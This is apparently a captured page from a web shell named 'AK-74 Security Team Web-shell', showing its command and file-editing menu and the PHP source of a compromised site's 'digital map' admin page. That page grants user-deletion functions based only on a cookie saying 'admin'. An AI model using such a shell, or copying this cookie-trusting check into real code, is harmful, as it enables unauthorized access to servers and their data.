.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>digital map</title> <script src="SpryAssets/SpryMenuBar.js" type="text/javascript"></script> <link href="SpryAssets/SpryMenuBarHorizontal.css" rel="stylesheet" type="text/css" /> <style> body { background-image: url('logo.png'); background-repeat:no-repeat; background-position: center; background-position-y: 78px; } li{ width: 66px; } </style> </head> <body> <?php //print_r($_COOKIE['username']); if($_COOKIE['username']=='admin'){ ?> <ul id="MenuBar1" class="MenuBarHorizontal" style="padding-left: 511px; padding-top: 259px;"> <!-- <li><a href="all-client">All client</a></li> <li><a href="by-client">By-client</a></li>--> <!-- <li><a href="municipality">Municipality</a></li>--> <!--<li><a href="add_all_engine.php">All engine</a></li>--> <li><a href="client.php">Delete User</a> </li> <li><a href="iemi">Delete Iemi's</a></li> <!--<li><a href="serverevent">events</a></li>--> </ul> <script type="text/javascript"> var MenuBar1 = new Spry.Widget.MenuBar("MenuBar1", {imgDown:"SpryAssets/SpryMenuBarDownHover.gif", imgRight:"SpryAssets/SpryMenuBarRightHover.gif"}); </script> <?}else { header('Location:index.php'); } ?> </body> </html>
Rename:
-